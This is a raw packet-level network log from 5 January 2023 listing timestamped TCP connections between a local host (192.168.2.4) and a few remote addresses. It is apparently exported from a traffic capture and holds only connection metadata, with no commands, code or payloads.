                                                                                                                                                                                    Jan 5, 2023 08:58:38.525540113 CET4975880192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:38.567804098 CET4975880192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:38.628760099 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.628797054 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.628818035 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.628823042 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.628933907 CET804975862.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.628946066 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.628957987 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.629025936 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.629069090 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.631685972 CET804975862.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.631767988 CET4975880192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:38.662195921 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.662213087 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.662236929 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.662257910 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.662352085 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.662358999 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.662368059 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.662456989 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.662463903 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.662475109 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.662647009 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.662647009 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.662656069 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.662703991 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.662746906 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.662755013 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.662771940 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.662806988 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.662851095 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.662883043 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.662950993 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.663029909 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.762917042 CET4975880192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:38.764062881 CET4975980192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:38.824253082 CET804975862.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.824368000 CET4975880192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:38.824965000 CET804975962.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.825043917 CET4975980192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:38.842133045 CET4975980192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:38.874716043 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.874814034 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.903458118 CET804975962.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.906658888 CET804975962.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.906745911 CET4975980192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:38.985830069 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.985857964 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.985887051 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:38.986018896 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:38.986099005 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:39.045888901 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:39.045936108 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:39.045977116 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:39.046020031 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:39.046139002 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:39.046165943 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:39.046297073 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:39.046317101 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:39.046396971 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:39.046420097 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:39.046473026 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:39.046597958 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:39.046623945 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:39.046695948 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:39.046792030 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:39.046818018 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:39.047184944 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:39.084996939 CET4975980192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:39.086661100 CET4976080192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:39.146365881 CET804975962.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:39.146486998 CET4975980192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:39.148835897 CET804976062.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:39.148986101 CET4976080192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:39.158668041 CET4976080192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:39.221134901 CET804976062.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:39.226624966 CET804976062.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:39.226767063 CET4976080192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:39.254725933 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:39.254841089 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:39.407942057 CET4976080192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:39.409090042 CET4976280192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:39.420857906 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:39.420895100 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:39.420928001 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:39.420933962 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:39.420937061 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:39.421108961 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:39.469645023 CET804976262.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:39.469742060 CET4976280192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:39.470232010 CET804976062.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:39.470351934 CET4976080192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:39.496805906 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:39.516895056 CET4976280192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:39.577605963 CET804976262.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:39.581068993 CET804976262.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:39.581391096 CET4976280192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:39.736043930 CET4976280192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:39.737207890 CET4976380192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:39.796622992 CET804976262.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:39.796735048 CET4976280192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:39.798342943 CET804976362.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:39.798522949 CET4976380192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:39.887077093 CET4976380192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:39.948487043 CET804976362.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:39.952187061 CET804976362.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:39.952284098 CET4976380192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:39.995776892 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:40.057930946 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:40.058015108 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:40.058105946 CET49747443192.168.2.468.65.123.54
                                                                                                                                                                                    Jan 5, 2023 08:58:40.058130026 CET4434974768.65.123.54192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:40.104274035 CET4976380192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:40.105669975 CET4976480192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:40.165978909 CET804976362.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:40.166089058 CET4976380192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:40.166809082 CET804976462.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:40.166930914 CET4976480192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:40.202977896 CET4976480192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:40.264446020 CET804976462.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:40.269469023 CET804976462.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:40.269541025 CET4976480192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:40.444773912 CET4976480192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:40.454341888 CET4976580192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:40.506253004 CET804976462.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:40.506460905 CET4976480192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:40.514807940 CET804976562.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:40.514909029 CET4976580192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:40.524107933 CET4976580192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:40.584678888 CET804976562.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:40.587769985 CET804976562.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:40.587863922 CET4976580192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:40.777555943 CET4976580192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:40.779340982 CET4976680192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:40.838223934 CET804976562.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:40.838304996 CET4976580192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:40.841833115 CET804976662.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:40.842001915 CET4976680192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:40.852775097 CET4976680192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:40.915415049 CET804976662.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:40.918960094 CET804976662.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:40.919071913 CET4976680192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:41.580329895 CET4976680192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:41.643078089 CET804976662.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:41.646822929 CET4976680192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:41.689909935 CET4976780192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:41.749344110 CET804976762.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:41.750128031 CET4976780192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:41.873802900 CET4976780192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:41.933291912 CET804976762.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:41.944175005 CET804976762.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:41.951489925 CET4976780192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:44.365328074 CET4976780192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:44.366513968 CET4976880192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:44.424917936 CET804976762.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:44.424998045 CET4976780192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:44.427613974 CET804976862.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:44.427691936 CET4976880192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:44.569907904 CET4976880192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:44.631241083 CET804976862.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:44.637294054 CET804976862.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:44.637382030 CET4976880192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:44.752980947 CET49679443192.168.2.4204.79.197.200
                                                                                                                                                                                    Jan 5, 2023 08:58:44.753021002 CET49681443192.168.2.4204.79.197.200
                                                                                                                                                                                    Jan 5, 2023 08:58:44.753051996 CET49682443192.168.2.4204.79.197.200
                                                                                                                                                                                    Jan 5, 2023 08:58:44.796889067 CET4976880192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:44.804923058 CET4976980192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:44.858414888 CET804976862.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:44.858582973 CET4976880192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:44.866303921 CET804976962.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:44.866461039 CET4976980192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:44.873665094 CET4976980192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:44.935128927 CET804976962.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:44.938595057 CET804976962.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:44.938710928 CET4976980192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:45.170058966 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:45.173886061 CET4976980192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:45.187474966 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.187555075 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:45.188361883 CET4977080192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:45.234321117 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.236355066 CET804976962.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.236440897 CET4976980192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:45.247904062 CET804977062.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.248023033 CET4977080192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:45.251672029 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.251776934 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.251955032 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.251969099 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.266340971 CET4977080192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:45.269207001 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.269242048 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.326189995 CET804977062.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.332384109 CET804977062.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.332598925 CET4977080192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:45.381443977 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.381479025 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.381563902 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.451653957 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.451704979 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.463973999 CET4977080192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:45.464981079 CET4977280192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:45.468878031 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.468904018 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.525372028 CET804977062.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.525403976 CET804977262.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.525497913 CET4977080192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:45.525538921 CET4977280192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:45.537185907 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.537220001 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.537234068 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.537247896 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.537261009 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.537273884 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.537286997 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.537301064 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.537425041 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.537894011 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.537919998 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.537940979 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.537960052 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.538019896 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.558634043 CET4977280192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:45.582878113 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.582907915 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.582926989 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.582947969 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.583004951 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.583049059 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.583116055 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.583141088 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.583174944 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.583195925 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.583205938 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.583250046 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.583920956 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.583945036 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.583966017 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.583986044 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.584000111 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.584037066 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.584732056 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.584757090 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.584775925 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.584795952 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.584824085 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.584846020 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.585575104 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.585594893 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.585617065 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.585656881 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.586204052 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.586271048 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.586375952 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.586395979 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.586414099 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.586451054 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.620929003 CET804977262.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.624954939 CET804977262.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.625694036 CET4977280192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:45.626019001 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.626044035 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.626065969 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.626085997 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.626095057 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.626130104 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.626363993 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.626388073 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.626409054 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.626429081 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.626441956 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.626472950 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.627245903 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.627271891 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.627294064 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.627315044 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.627343893 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.627371073 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.628046036 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.628073931 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.628093958 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.628115892 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.628133059 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.628164053 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.628894091 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.628920078 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.628938913 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.628958941 CET8049771188.114.97.9192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:45.628974915 CET4977180192.168.2.4188.114.97.9
                                                                                                                                                                                    Jan 5, 2023 08:58:45.628992081 CET4977180192.168.2.4188.114.97.9
